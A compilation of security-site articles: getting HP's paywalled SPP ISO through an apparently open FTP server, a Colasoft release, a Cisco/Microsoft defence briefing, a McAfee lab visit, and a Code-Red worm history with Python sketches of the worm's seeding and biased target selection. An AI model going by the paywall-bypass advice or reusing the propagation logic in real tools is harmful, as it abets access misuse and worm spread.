Downloading all necessary drivers and firmware upgrades for your HP ProLiant server is very important, especially if hardware compatibility is critical for new operating system installations or virtualized environments (VMware, Hyper-V). Until recently, HP customers could download the HP Service Pack for ProLiant (SPP) free of charge, but that’s no longer the case, as HP is forcing customers to pay up in order to get access to its popular SPP package.

For those who are unaware, the HP SPP is a single ISO image that contains all the latest firmware, software and drivers for HP’s ProLiant servers, supporting older and newer operating systems, including virtualization platforms such as VMware and Hyper-V.

From HP’s perspective, you can either search for and download each individual driver you think is needed for your server free of charge, or you buy a support contract and get everything in one neat ISO with all the necessary additional tools to make life easy – sounds attractive, right? Well, it depends which way you look at it… not everyone is happy to pay for firmware and driver updates considering they are usually provided free of charge.

A quick search for HP Proliant firmware or drivers on any search engine will bring up HP’s Enterprise Support Center where the impression is given that we are one step away from downloading our much wanted SPP:


Figure 1. Attempting to download the HP Service Pack for ProLiant (SPP) ISO

When clicking on the ‘Obtain Software’ link, users receive the bad news:


Figure 2. Sorry, you need to pay up to download the HP Service Pack ISO image!

Well, this is not the case – at least for now.

Apparently HP has set up this new policy to ensure customers pay for their server driver upgrades; however, they’ve forgotten (thankfully) one very important detail – securing the location of the HP Service Pack for ProLiant (SPP) ISO :)

To directly access the latest version of HP’s SPP ISO image simply click on the following URL or copy-paste it to your web browser:

ftp://ftp.hp.com/pub/softlib2/software1/cd-generic/p67859018/v113584/

HP’s FTP server is apparently wide open, allowing anonymous users to access and download not only the latest SPP ISO image, but pretty much browse the whole SPP repository and download any SPP version they want:


Figure 3. The latest (free) HP SPP ISO is just a click away!

Simply click the “Up to higher level directory” link to move up and get access to all other versions of the SPP repository!

It’s great to see HP really cares about its customers and allows them to freely download the HP Service Pack (SPP) for ProLiant servers. It’s not every day you get a vendor being so generous to its customers, so if you’ve got an HP ProLiant server, make sure you update its drivers and firmware while you still can!

Note: The above URL might no longer be active - in that case you can download it from here:

https://www.systrade.de/download/SPP/


Colasoft Announces Release of Capsa Network Analyzer v8.2

February 23, 2016 – Colasoft LLC, a leading provider of innovative and affordable network analysis solutions, today announced the availability of Colasoft Capsa Network Analyzer v8.2, a real-time portable network analyzer for wired and wireless network monitoring, bandwidth analysis, and intrusion detection. The data flow display and protocols recognition are optimized in Capsa Network Analyzer 8.2.

Capsa v8.2 is capable of analyzing the traffic of wireless AP with 2 channels. Users can choose up to 2 wireless channels to analyze the total traffic which greatly enhances the accuracy of wireless traffic analysis. Hex display of decoded data is added in Data Flow sub-view in TCP/UDP Conversation view. Users can switch the display format between hex and text in Capsa v8.2.

Besides the optimizations of Data Flow sub-view in TCP/UDP Conversation view, with the continuous improvement of CSTRE (Colasoft Traffic Recognition Engine), Capsa 8.2 is capable of recognizing up to 1546 protocols and sub-protocols, which covers most of the mainstream protocols.

“We have also enhanced the interface of Capsa which improves user experience”, said Brian K. Smith, Vice President at Colasoft LLC, “the release of Capsa v8.2 provides a more comprehensive network analyze result to our customers.”


Safety in Numbers - Cisco & Microsoft

By Campbell Taylor

Recently I attended a presentation by Lynx Technology in London. The presentation was about the complementary use of Cisco and Microsoft technology for network security. The title of the presentation was “End-to-end Security Briefing” and it set out to show the need for security within the network as well as at the perimeter. This document is an overview of that presentation but focuses on some key areas rather than covering the entire presentation verbatim. The slides for the original presentation can be found at http://www.lynxtec.com/presentations/.

The presentation opened with a discussion about firewalls and recommended a dual firewall arrangement as being the most effective in many situations. Their dual firewall recommendation was a hardware firewall at the closest point to the Internet; for this they recommended Cisco's PIX firewall. The recommendation for the second firewall was an application firewall, such as Microsoft's Internet Security and Acceleration Server (ISA) 2004 or Checkpoint's NG products.

The key point made here is that the hardware firewall will typically filter traffic from OSI levels 1 – 4 thus easing the workload on the 2nd firewall which will filter OSI levels 1 – 7.

To elaborate, the first firewall can check that packets are of the right type but cannot look at the payload that may be malicious, malformed HTTP requests, viruses, restricted content etc.

This level of inspection is possible with ISA.

Figure 1. Dual firewall configuration
Provides improved performance and filtering for traffic from OSI levels 1 – 7.

 You may also wish to consider terminating any VPN traffic at the firewall so that the traffic can be inspected prior to being passed through to the LAN. End to end encryption is creating security issues, as some firewalls are not able to inspect the encrypted traffic. This provides a tunnel for malicious users through the network firewall.

Content attacks were seen as an area of vulnerability, which highlights the need to scan the payload of packets. The presentation made particular mention of attacks via SMTP and Outlook Web Access (OWA).

Network vendors are moving towards providing a security checklist that is applied when a machine connects to the network. Cisco's version is called Network Access Control (NAC) and Microsoft's is called Network Access Quarantine Control (NAQC) although another technology called Network Access Protection (NAP) is to be implemented in the future.

Previously NAP was to be a part of Server 2003 R2 (R2 due for release end of 2005). Microsoft and Cisco have agreed to develop their network access technologies in a complementary fashion so that they will integrate. Therefore clients connecting to the Cisco network will be checked for appropriate access policies based on Microsoft's Active Directory and Group Policy configuration.

The following is taken directly from the Microsoft website: http://www.microsoft.com/windowsserver2003/techinfo/overview/quarantine.mspx

Note: Network Access Quarantine Control is not the same as Network Access Protection, which is a new policy enforcement platform that is being considered for inclusion in Windows Server "Longhorn," the next version of the Windows Server operating system.

Network Access Quarantine Control only provides added protection for remote access connections. Network Access Protection provides added protection for virtual private network (VPN) connections, Dynamic Host Configuration Protocol (DHCP) configuration, and Internet Protocol security (IPsec)-based communication.

 ISA Server & Cisco Technologies

ISA 2004 sits in front of the server OS that hosts the application firewall and filters traffic as it enters the server from the NIC, thereby intercepting it before it is passed up the OSI layers.

This means that ISA can still offer a secure external-facing application firewall even when the underlying OS may be unpatched and vulnerable. Lynx advised that ISA 2000, with a throughput of 282 Mbps, beat its next closest rival, Checkpoint. ISA 2004 offers an even higher throughput of 1.59 Gbps (Network Computing Magazine, March 2003).


Cisco's NAC can be used to manage user nodes (desktops and laptops) connecting to your LAN. A part of Cisco's NAC is the Cisco Trust Agent which is a component that runs on the user node and talks to the AV server and RADIUS server. NAC targets the “branch office connecting to head office” scenario and supports AV vendor products from McAfee, Symantec and Trend. Phase 2 of Cisco's NAC will provide compliance checking and enforcement with Microsoft patching.

ISA can be utilized in these scenarios with any new connections being moved to a stub network. Checks are then run to make sure the user node meets the corporate requirements for AV, patching, authorisation etc. Compliance is enforced by NAC and NAQC/NAP. Once a connecting user node passes this security audit and any remedial actions are completed the user node is moved from the stub network into the LAN proper.

Moving inside the private network, the “Defence in depth” mantra was reiterated. A key point was to break up a flat network. For example, clients should have little need to talk directly to each other; instead, traffic should follow more of a star topology, with the servers in the centre and clients talking to the servers. This is where Virtual Local Area Networks (VLANs) would be suitable, and this type of configuration makes it more difficult for network worms to spread.

Patch Management, Wireless & Security Tools

Patch Management

Patch management will ensure that known Microsoft vulnerabilities can be addressed (generally) by applying the relevant hotfix or service pack. Although not much detail was given, the Hotfix Network Checker (HFNetChk) was highlighted as an appropriate tool along with the Microsoft Baseline Security Analyser (MBSA).

Restrict Software

Active Directory is also a key tool for administrators who manage user nodes running Windows XP and Windows 2000. With Group Policies for Active Directory you can prevent specified software from running on a Windows XP user node.

To do this use the “Software Restriction Policy”. You can then blacklist specific software based on any of the following (a short illustration of the hash-rule idea follows the list):

  • A hash value of the software
  • A digital certificate for the software
  • The path to the executable
  • Internet Zone rules
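
As a rough Python illustration of the hash-rule idea only (Windows enforces Software Restriction Policy itself, and the blocklist value below is hypothetical), a file's hash identifies an executable regardless of its name or location:

import hashlib
import sys

# Hypothetical blocklist of SHA-256 hashes for executables the policy disallows.
BLOCKED_SHA256 = {
    "replace-with-the-sha256-hash-of-a-disallowed-executable",
}

def sha256_of(path):
    # Hash the file in chunks so large executables do not need to fit in memory.
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

if __name__ == "__main__":
    target = sys.argv[1]
    verdict = "blocked" if sha256_of(target) in BLOCKED_SHA256 else "allowed"
    print("%s: %s" % (target, verdict))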

File, Folder and Share access

On the server all user access to files, folders and shares should be locked down via NTFS (requires Windows NT or higher). Use the concept of minimal necessary privilege.

User Node Connectivity

The firewall in Service Pack 2 for Windows XP (released 25 August 2004) can be used to limit what ports are open to incoming connections on the Windows XP user node.

Wireless

As wireless becomes more widely deployed and integrated more deeply in day-to-day operations we need to manage security and reliability. Lynx estimates that wireless installations can provide up to a 40% reduction in installation costs over standard fixed line installations. But wireless and the ubiquity of the web mean that the network perimeter is now on the user node's desktop.

NAC and NAP, introduced earlier, will work with Extensible Authentication Protocol-Transport Level Security (EAP-TLS). EAP-TLS is used as a wireless authentication protocol. This means the wireless user node can still be managed for patching, AV and security compliance on the same basis as fixed line (e.g. Ethernet) connected user nodes.

EAP-TLS is scalable but requires Windows 2000 and Active Directory with Group Policy. To encrypt wireless traffic, 802.1x is recommended, and if you want to investigate single sign-on for your users across the domain then you could look at Public Key Infrastructure (PKI).

As part of your network and security auditing you will want to check the wireless aspect; the NetStumbler tool runs on a wireless client and reports on any wireless networks that have sufficient strength to be picked up.

As a part of your physical security for wireless networking you should consider placing Wireless Access Points (WAPs) in locations that provide restricted user access, for example in the ceiling cavity. Of course you will need to ensure that you achieve the right balance of physical security and usability, making sure that the signal is still strong enough to be used.

Layer 8 of the OSI model

The user was jokingly referred to as being the eighth layer in the OSI model and it is here that social engineering and other non-technical reconnaissance and attack methods can be attempted. Kevin Mitnick has written “The Art Of Deception: Controlling The Human Element Of Security” which is highly regarded in the IT security environment.

One countermeasure to employ for social engineering is ensuring that all physical material is disposed of securely. This includes internal phone lists, hard copy documents, software user manuals etc. User education is one of the most important actions, so you could consider user-friendly training with workshops and reminders (posters, email memos, briefings) to create a security-conscious workplace.

Free Microsoft Security Tools

MBSA, mentioned earlier, helps audit the security configuration of a user/server node. Other free Microsoft tools are the Exchange Best Practice Analyser, SQL Best Practice Analyser and the Microsoft Audit Collection System.

For conducting event log analysis you could use the Windows Server 2003 Resource Kit tool called EventcombMT. User education can be enhanced with visual reminders like a login message or posters promoting password security.

For developing operational guidelines the IT Infrastructure Library (ITIL) provides a comprehensive and customisable solution. ITIL was developed by the UK government and is now used internationally. Microsoft's own framework, the Microsoft Operations Framework, draws from ITIL. There is also assistance in designing and maintaining a secure network provided free by Microsoft, called the “Security Operations Guide”.

Summary

Overall then, the aim is to provide layers of defence. For this you could use a Cisco PIX as your hardware firewall (first firewall) with Microsoft ISA 2004 as your application layer firewall (second firewall). You may also use additional ISA 2004 servers as internal firewalls to screen branch-to-head-office traffic.

The user node will authenticate to the domain. Cisco NAC and Microsoft NAQC/NAP will provide a security audit, authentication and enforcement for user nodes connecting to the LAN before they gain authorisation. If any action is required to make the user node meet the specified corporate security policies, this will be carried out by moving the user node to a restricted part of the network.

Once the user node is authenticated, authorised and compliant with the corporate security policy, it will be allowed to connect with its full, allowed rights as part of the private network. If using wireless, EAP-TLS may be used for authentication and 802.1x for the encryption of the wireless traffic.

To help strengthen the LAN if the outer perimeter is defeated you need to look at segmenting the network. This will help minimise or delay malicious and undesirable activity from spreading throughout your private network. VLANs will assist with creating workgroups based on job function, allowing you to restrict the scope of network access a user may have.

For example, rather than any user being able to browse to the Payroll server, you can use VLANs to restrict access to that server to only the HR department. Routers can help to minimise the spread of network worms and undesirable traffic by introducing Access Control Lists (ACLs).

To minimise the chance of “island hopping” where a compromised machine is used to target another machine, you should ensure that the OS of all clients and Servers are hardened as much as possible – remove unnecessary services, patch, remove default admin shares if not used and enforce complex passwords.

Also stop clients from having easy access to another client machine unless it is necessary. Instead, build more secure client-to-server access. The server will typically have better security because it is part of a smaller group of machines, and thus more manageable; it is also a higher-profile machine.

Applications should be patched and countermeasures put in place for known vulnerabilities. This includes Microsoft Exchange, SQL and IIS, which are high on a malicious hacker's attack list. The data on the servers can then be secured using NTFS permissions to only permit those who are authorised to access the data in the manner you specify.

Overall the presentation showed me that a more integrated approach to network security was being taken by vendors. Interoperability is going to be important to ensure the longevity of your solution, but it is refreshing to see two large players in the IT industry like Cisco and Microsoft working together.


A Day In The Antivirus World

This article, written by Campbell Taylor ('Global'), is a review of the information learnt from a one-day visit to McAfee and includes personal observations or further information that he felt was useful to the overall article. He refers to malicious activity as a term covering the range of activity that includes worms, viruses, backdoors, Trojans and exploits. Italics indicate a personal observation or comment.

In December 2004 I was invited to a one-day workshop at McAfee's offices and AVERT lab at Aylesbury in England. As you are probably aware, McAfee is an anti-virus (AV) vendor and AVERT (Anti-Virus Emergency Response Team) is McAfee's AV research lab.

This visit is the basis for the information in this document and is split into 4 parts:

1) THREAT TRENDS

2) SECURITY TRENDS

3) SOME OF TODAY'S SECURITY RESPONSES

4) AVERT LAB VISIT

Threat Trends

Infection by Browsing

Browsing looks set to become a bigger method of infection by a virus in the near future, but there was also concern about the potential for 'media-independent propagation by a virus', which I found very interesting.

 

Media Independent propagation

By media independent I mean that the virus is not constrained to travelling over any specific media like Ethernet or via other physical infrastructure installations. McAfee's research showed a security risk with wireless network deployment which is discussed in the Security Trends section of this document.

So what happens if a virus or worm were able to infect a desktop via any common method and that desktop was part of a wired and wireless network? Instead of just searching the fixed wire LAN for targets, the virus/worm looks for wireless networks that are of sufficient strength to allow it to jump into that network.

You can draw up any number of implications from this but my personal observation is that this means you have to consider the wireless attack vector as seriously as the fixed wire attack vector. This reinforces the concept that the network perimeter is no longer based on the Internet/Corporate LAN perimeter and instead it now sits wherever interaction between the host machine and foreign material exists. This could be the USB memory key from home, files accessed on a compromised server or the web browser accessing a website.

An interesting observation from the McAfee researcher was that this would mean a virus/worm distribution starting to follow a more biological distribution. In other words you would see concentrations of the virus in metropolitan areas and along key meeting places like cyber cafes or hotspots.

Distributed Denial of Service (DDos)

DDoS attacks are seen as a continuing threat because of the involvement of criminals in the malicious hacker/cracker world. Using DDoS for extortion provides criminals with a remote-control method of raising capital.

Virus writers are starting to instruct their bot armies to coordinate their timekeeping by accessing Internet-based time servers. This means that all bots are using a consistent time reference. In turn this makes any DDoS that much more effective than relying on independent sources of time reference.

As a personal note, network administrators and IT security people might consider who needs access to Internet-based time servers. You may think about applying an access control list (ACL) that only permits NTP from one specified server in your network and denies all other NTP traffic. The objective is to reduce the chances of any of your machines being used as part of a bot army for DDoS attacks.

Identity Theft

This was highlighted as a significant likely trend in the near future and is part of the increase in Phishing attacks that have been intercepted by MessageLabs.

SOCKS used in sophisticated identity theft

McAfee did not go into a lot of detail about this but they pointed out that SOCKS is being used by malicious hackers to bypass corporate firewalls because SOCKS is a proxy service. I don't know much about SOCKS so this is more of a heads up about technologies being used maliciously in the connected world.

Privacy versus security

One of the speakers raised the challenge of privacy versus security. Here the challenge is promoting the use of encrypted traffic to provide protection for data whilst in transit but then the encrypted traffic is more difficult to scan with AV products. In some UK government networks no encrypted traffic is allowed so that all traffic can be scanned.

In my opinion this is going to become more of an issue as consumers and corporates create a demand for the perceived security of HTTPS, for example.

Flexibility versus security

In the McAfee speaker's words this is about “ease of use versus ease of abuse”. If security makes IT too difficult to use effectively then end users will circumvent security.

Sticky notes with passwords on the monitor anyone?


Security Trends

Wireless Security

Research by McAfee showed that, on average, 60% of all wireless networks were deployed insecurely (many without even the use of WEP keys).

The research was conducted by war driving with a laptop running NetStumbler in London and Reading (United Kingdom) and Amsterdam (Netherlands). The research also found that in many locations in major metropolitan areas there was often an overlap of several wireless networks of sufficient strength to attempt a connection.

AV product developments

AV companies are developing and distributing AV products for Personal Digital Assistants (PDAs) and smart phones. For example, F-secure, a Finnish AV firm, is providing AV software for Nokia (which, not surprisingly is based in Finland).

We were told that standard desktop AV products are limited to being reactive in many instances, as they cannot detect a virus until it is written to the hard disk. Therefore in a Windows environment - Instant Messaging, Outlook Express and web surfing with Internet Explorer - the user is exposed, as web content is not necessarily written to the hard disk.

This is where the concept of desktop firewalls or buffer overflow protection is important. McAfee's newest desktop product, VirusScan 8.0i, offers access protection that is designed to prevent undesired remote connections; it also offers buffer overflow protection. However it is also suggested that a firewall would be useful to stop network worms.

An interesting program that the speaker mentioned (obviously out of earshot of the sales department) was the Proxomitron. The way it was explained to me was that Proxomitron is a local web proxy. It means that web content is written to the hard disk and then the web browser retrieves the web content from the proxy. Because the web content has been written to hard disk your standard desktop AV product can scan for malicious content.

I should clarify at this point that core enterprise/server AV solutions like firewall/web filtering and email AV products are designed to scan in memory as well as the hard disk.

I guess it is to minimise the footprint and performance impact that the desktop AV doesn't scan memory. No doubt marketing is another factor – why kill off your corporate market when it generates substantial income?

AV vendors forming partnerships with Network infrastructure vendors

Daily AV definition file releases

McAfee is moving to daily definition releases in an attempt to minimise the window of opportunity for infection.

Malicious activity naming

A consistent naming convention that is vendor independent is run by CVE (Common Vulnerabilities and Exposures). McAfee will be including the CVE reference to malicious activity that is ranked by McAfee as being of medium threat or higher.

Other vendors may use a different approach, but I feel the use of a common reference method will help people in the IT industry to correlate data about malicious activity from different sources, rather than the often painful (for me at least) hunting exercise we engage in to get material from different vendors or sources about malicious activity.

AV products moving from reactive detection to proactive blocking of suspect behaviour

New AV products from McAfee (for example VirusScan 8.0i) are including suspect behaviour detection and blocking as well as virus signature detection. This acknowledges that virus detection by a virus signature is a reactive action. So by blocking suspicious behaviour you can prevent potential virus activity before a virus signature has been developed. For example port blocking can be used to stop a mydoom style virus from opening ports for backdoor access.

A personal observation is that Windows XP Service Pack 2 does offer a Firewall but this is a limited firewall as it provides port blocking only for traffic attempting to connect to the host. Therefore it would not stop a network worm searching for vulnerable targets.

Some of Today's Security Responses

Detecting potential malicious activity - Network

Understand your network's traffic patterns and develop a baseline of network traffic. If you see a significant unexpected change in your network traffic you may be seeing the symptoms of malicious activity.

Detecting potential malicious activity - Client workstation

On a Windows workstation, if you run “netstat -a” from the command line you can see the ports that the workstation has open and to whom it is trying to connect. If you see ports open that are unexpected, especially ones outside of the well-known range (1 – 1024), or connections to unexpected IP addresses, then further investigation may be worthwhile.
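
The same check can also be scripted. The sketch below is a minimal example, assuming the third-party psutil package is installed; the EXPECTED_PORTS baseline is purely illustrative and would need to reflect your own workstation.

import psutil

EXPECTED_PORTS = {135, 139, 445}    # hypothetical baseline for this workstation

for conn in psutil.net_connections(kind="inet"):
    if conn.status == psutil.CONN_LISTEN and conn.laddr:
        port = conn.laddr.port
        if port not in EXPECTED_PORTS:
            print("Unexpected listening port %d (pid %s)" % (port, conn.pid))
    elif conn.status == psutil.CONN_ESTABLISHED and conn.raddr:
        # Established connections to unfamiliar remote addresses may also
        # warrant a closer look.
        print("Connection to %s:%d (pid %s)" % (conn.raddr.ip, conn.raddr.port, conn.pid))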

Tightening Corporate Email security

With the prevalence of mass-mailing worms and viruses, McAfee offered a few no/low-cost steps that help to tighten your email security.

  1. Prevent all SMTP traffic in/outwards that is not for your SMTP server
  2. Prevent MX record look up
  3. Create a honeypot email address in your corporate email address book so that any mass mail infections will send an email to this honeypot account and alert you to the infection. It was suggested that the email account be inconspicuous e.g. not containing any admin, net, help, strings in the address. Something like '#_#@your domain' would probably work.

AVERT LAB VISIT

We were taken to the AVERT labs where we were shown the path from the submission of a suspected malicious sample through to the testing of the suspect sample and then to the development of the removal tools and definition files, their testing and deployment.

Samples are collected by submission via email, removable media via mail (e.g. CD or floppy disk) or captured via AVERT's honeypots in the wild.

Once a sample is received a copy is run on a goat rig. A goat rig is a test/sacrificial machine. The phrase “goat rig” comes from the practice in the past of tethering a goat in a clearing to attract animals the hunter wanted to capture. In this case the goat rig was a powerful workstation running several virtual machines courtesy of VMware software that were in a simulated LAN. The simulation went so far as to include a simulated access point to the Internet and Internet based DNS server.

The sample is run on the goat rig for observational tests. Observational tests are the first tests conducted after the sample has been scanned for known malicious signature files. Naturally malicious activity is not often visible to the common end user, so observable activity means executing the sample and looking for files or registry keys created by the sample, new ports opened and unexpected suspicious network traffic from the test machine.

As a demonstration the lab technicians ran a sample of the mydoom virus and the observable behaviour at this point was the opening of port 3127 on the test host, unexpected network traffic from the test host and newly created registry keys. The lab technician pointed out that a firewall on the host, blocking unused ports, would have very easily prevented mydoom from spreading.

Following observational tests the sample will be submitted for reverse engineering if it's considered complex enough or it warrants further investigation.

AVERT engineers that carry out reverse engineering are located throughout the world and I found it interesting that these reverse engineers and Top AV researchers maintain contact with their peers in the other main AV vendors. This collaboration is not maintained by the AV vendors but by the AV engineers so that it is based on a trust relationship. This means that the knowledge about a sample that has been successfully identified and reverse engineered to identify payload, characteristics etc is passed to others in the AV trust group.

From the test lab we went through to the AV definition testing lab. After the detection rules and a new AV definition have been written the definition is submitted to this lab. The lab runs an automated test that applies the updated AV definition on most known Operating System platforms and against a wide reference store of known applications.

The intention is to prevent the updated AV definition from giving false positives on known safe applications.

Imagine the grief if an updated AV definition provided a false positive on Microsoft's Notepad!

One poor soul was in a corner busy surfing the web and downloading all available material to add to their reference store of applications for testing future AV definitions.

After passing the reference store test an email is sent to all subscribers of the McAfee DAT notification service and the updated AV definition is made available on the McAfee website for download.

In summary, the AVERT lab tour was an informative look behind the scenes, without much of a sales pitch, and I found the co-operation amongst AV researchers of different AV companies very interesting.


Code-Red Worms: A Global Threat

The first incarnation of the Code-Red worm (CRv1) began to infect hosts running unpatched versions of Microsoft's IIS webserver on July 12th, 2001. The first version of the worm uses a static seed for its random number generator. Then, around 10:00 UTC in the morning of July 19th, 2001, a random seed variant of the Code-Red worm (CRv2) appeared and spread. This second version shared almost all of its code with the first version, but spread much more rapidly. Finally, on August 4th, a new worm began to infect machines exploiting the same vulnerability in Microsoft's IIS webserver as the original Code-Red virus. Although the new worm shared almost no code with the two versions of the original worm, it contained in its source code the string "CodeRedII" and was thus named CodeRedII. The characteristics of each worm are explained in greater detail below.

The IIS .ida Vulnerability

On June 18, 2001 eEye released information about a buffer-overflow vulnerability in Microsoft's IIS webservers.

The remotely exploitable vulnerability was discovered by Riley Hassell. It allows system-level execution of code and thus presents a serious security risk. The buffer-overflow is exploitable because the ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers.

Code-Red version 1 (CRv1)

On July 12, 2001, a worm began to exploit the aforementioned buffer-overflow vulnerability in Microsoft's IIS webservers. Upon infecting a machine, the worm checks to see if the date (as kept by the system clock) is between the first and the nineteenth of the month. If so, the worm generates a random list of IP addresses and probes each machine on the list in an attempt to infect as many computers as possible. However, this first version of the worm uses a static seed in its random number generator and thus generates identical lists of IP addresses on each infected machine.

The first version of the worm spread slowly, because each infected machine began to spread the worm by probing machines that were either infected or impregnable. The worm is programmed to stop infecting other machines on the 20th of every month. In its next attack phase, the worm launches a Denial-of-Service attack against www1.whitehouse.gov from the 20th-28th of each month.
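
To see why the seed matters, here is a small Python illustration (not the worm's actual code, and the seed value is arbitrary): with a fixed seed every copy of CRv1 produces the same probe list, whereas a per-host random seed, as used by the later CRv2 variant, gives each infected machine its own list.

import random

def probe_list(seed, count=5):
    # Build a short list of pseudo-random IPv4 addresses from a given seed.
    rng = random.Random(seed)
    return [".".join(str(rng.randint(1, 254)) for _ in range(4)) for _ in range(count)]

# CRv1 behaviour: every infected host effectively uses the same seed,
# so every host probes the same addresses in the same order.
print(probe_list(seed=0x12345678))
print(probe_list(seed=0x12345678))              # identical list

# CRv2 behaviour: each host picks its own seed, so the lists differ.
print(probe_list(seed=random.getrandbits(32)))
print(probe_list(seed=random.getrandbits(32)))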

On July 13th, Ryan Permeh and Marc Maiffret at eEye Digital Security received logs of attacks by the worm and worked through the night to disassemble and analyze the worm. They christened the worm "Code-Red" both because the highly caffeinated "Code Red" Mountain Dew fueled their efforts to understand the workings of the worm and because the worm defaces some web pages with the phrase "Hacked by Chinese". There is no evidence either supporting or refuting the involvement of Chinese hackers with the Code-Red worm.

The first version of the Code-Red worm caused very little damage. The worm did deface web pages on some machines with the phrase "Hacked by Chinese." Although the worm's attempts to spread itself consumed resources on infected machines and local area networks, it had little impact on global resources.

The Code-Red version 1 worm is memory resident, so an infected machine can be disinfected by simply rebooting it. However, once rebooted, the machine is still vulnerable to repeat infection. Any machines infected by Code-Red version 1 and subsequently rebooted were likely to be reinfected, because each newly infected machine probes the same list of IP addresses in the same order.

Code-Red version 2

At approximately 10:00 UTC in the morning of July 19th, 2001 a random seed variant of the Code-Red worm (CRv2) began to infect hosts running unpatched versions of Microsoft's IIS webserver. The worm again spreads by probing random IP addresses and infecting all hosts vulnerable to the IIS exploit. Code-Red version 2 lacks the static seed found in the random number generator of Code-Red version 1. In contrast, Code-Red version 2 uses a random seed, so each infected computer tries to infect a different list of randomly generated IP addresses. This seemingly minor change had a major impact: more than 359,000 machines were infected with Code-Red version 2 in just fourteen hours.

Because Code-Red version 2 is identical to Code-Red version 1 in all respects except the seed for its random number generator, its only actual damage is the "Hacked by Chinese" message added to top level webpages on some hosts. However, Code-Red version 2 had a greater impact on global infrastructure due to the sheer volume of hosts infected and probes sent to infect new hosts. Code-Red version 2 also wreaked havoc on some additional devices with web interfaces, such as routers, switches, DSL modems, and printers. Although these devices were not infected with the worm, they either crashed or rebooted when an infected machine attempted to send them a copy of the worm.

Like Code-Red version 1, Code-Red version 2 can be removed from a computer simply by rebooting it. However, rebooting the machine does not prevent reinfection once the machine is online again. On July 19th, the probe rate to hosts was so high that many machines were infected as the patch for the .ida vulnerability was applied.

CodeRedII

On August 4, 2001, an entirely new worm, CodeRedII began to exploit the buffer-overflow vulnerability in Microsoft's IIS webservers. Although the new worm is completely unrelated to the original Code-Red worm, the source code of the worm contained the string "CodeRedII" which became the name of the new worm.

Ryan Permeh and Marc Maiffret analyzed CodeRedII to determine its attack mechanism. When a worm infects a new host, it first determines if the system has already been infected. If not, the worm initiates its propagation mechanism, sets up a "backdoor" into the infected machine, becomes dormant for a day, and then reboots the machine. Unlike Code-Red, CodeRedII is not memory resident, so rebooting an infected machine does not eliminate CodeRedII.

After rebooting the machine, the CodeRedII worm begins to spread. If the host infected with CodeRedII has Chinese (Taiwanese) or Chinese (PRC) as the system language, it uses 600 threads to probe other machines. All other machines use 300 threads.

CodeRedII uses a more complex method of selecting hosts to probe than Code-Red. CodeRedII generates a random IP address and then applies a mask to produce the IP address to probe. The length of the mask determines the similarity between the IP address of the infected machine and the probed machine. 1/8th of the time, CodeRedII probes a completely random IP address. 1/2 of the time, CodeRedII probes a machine in the same /8 (so if the infected machine had the IP address 10.9.8.7, the IP address probed would start with 10.), while 3/8ths of the time, it probes a machine on the same /16 (so the IP address probed would start with 10.9.).

Like Code-Red, CodeRedII avoids probing IP addresses in 224.0.0.0/8 (multicast) and 127.0.0.0/8 (loopback). The bias towards the local /16 and /8 networks means that an infected machine may be more likely to probe a susceptible machine, based on the supposition that machines on a single network are more likely to be running the same software as machines on unrelated IP addresses.
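
The target-selection bias described above can be sketched as follows. This is a rough Python approximation of the reported behaviour, not the worm's code:

import ipaddress
import random

def next_probe(infected_ip):
    # Bias the next probe toward the infected host's own /8 or /16 networks:
    # roughly 1/8 fully random, 1/2 same /8, 3/8 same /16.
    base = int(ipaddress.IPv4Address(infected_ip))
    while True:
        rand = random.getrandbits(32)
        roll = random.random()
        if roll < 1 / 8:                                  # completely random address
            candidate = rand
        elif roll < 1 / 8 + 1 / 2:                        # keep the first octet
            candidate = (base & 0xFF000000) | (rand & 0x00FFFFFF)
        else:                                             # keep the first two octets
            candidate = (base & 0xFFFF0000) | (rand & 0x0000FFFF)
        addr = ipaddress.IPv4Address(candidate)
        # Skip the loopback and multicast ranges, as the worm reportedly did.
        if addr not in ipaddress.ip_network("127.0.0.0/8") and \
           addr not in ipaddress.ip_network("224.0.0.0/8"):
            return str(addr)

# Most probes generated for 10.9.8.7 will start with 10. or 10.9.
print([next_probe("10.9.8.7") for _ in range(5)])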

The CodeRedII worm is much more dangerous than Code-Red because CodeRedII installs a mechanism for remote, root-level access to the infected machine. Unlike Code-Red, CodeRedII neither defaces web pages on infected machines nor launches a Denial-of-Service attack. However, the backdoor installed on the machine allows any code to be executed, so the machines could be used as zombies for future attacks (DoS or otherwise).

A machine infected with CodeRedII must be patched to prevent reinfection and then the CodeRedII worm must be removed. A security patch for this vulnerability is available from Microsoft at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp. A tool that disinfects a computer infected with CodeRedII is also available: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878.

CAIDA Analysis

CAIDA's ongoing analysis of the Code-Red worms includes a detailed analysis of the spread of Code-Red version 2 on July 19, 2001, a follow-up survey of the patch rate of machines infected on July 19th, and dynamic graphs showing the prevalence of Code-Red version 2 and CodeRedII worldwide.

The Spread of the Code-Red Worm (CRv2)

An analysis of the spread of the Code-Red version 2 worm between midnight UTC July 19, 2001 and midnight UTC July 20, 2001.

On July 19, 2001 more than 359,000 computers were infected with the Code-Red (CRv2) worm in less than 14 hours. At the peak of the infection frenzy, more than 2,000 new hosts were infected each minute. 43% of all infected hosts were in the United States, while 11% originated in Korea followed by 5% in China and 4% in Taiwan. The .NET Top Level Domain (TLD) accounted for 19% of all compromised machines, followed by .COM with 14% and .EDU with 2%. We also observed 136 (0.04%) .MIL and 213 (0.05%) .GOV hosts infected by the worm. An animation of the geographic expansion of the worm is available.

Animations

To help us visualize the initial spread of Code-Red version 2, Jeff Brown created an animation of the geographic spread of the worm in five minute intervals between midnight UTC on July 19, 2001 and midnight UTC on July 20, 2001. For the animation, infected hosts were mapped to latitude and longitude values using ipmapper, and aggregated by the number at each unique location. The radius of each circle is sized relative to the infected hosts mapped to the center of the circle using the formula 1+ln(total-infected-hosts). When smaller circles are obscured by larger circles, their totals are not combined with the larger circle; the smaller data points are hidden from view.

Although we attempted to identify the geographic location of each host as accurately as possible, in many cases the granularity of the location was limited to the country of origin. We plot these hosts at the center of their respective countries. Thus, the rapidly expanding central regions of most countries are an artifact of the localization method.

Animations created by Jeff Brown (UCSD CSE department), based on analysis by David Moore (CAIDA at SDSC).
Copyright UC Regents 2001.

About Code-Red

The references below provide further detail on each of the worms described above.

The IIS .ida Vulnerability

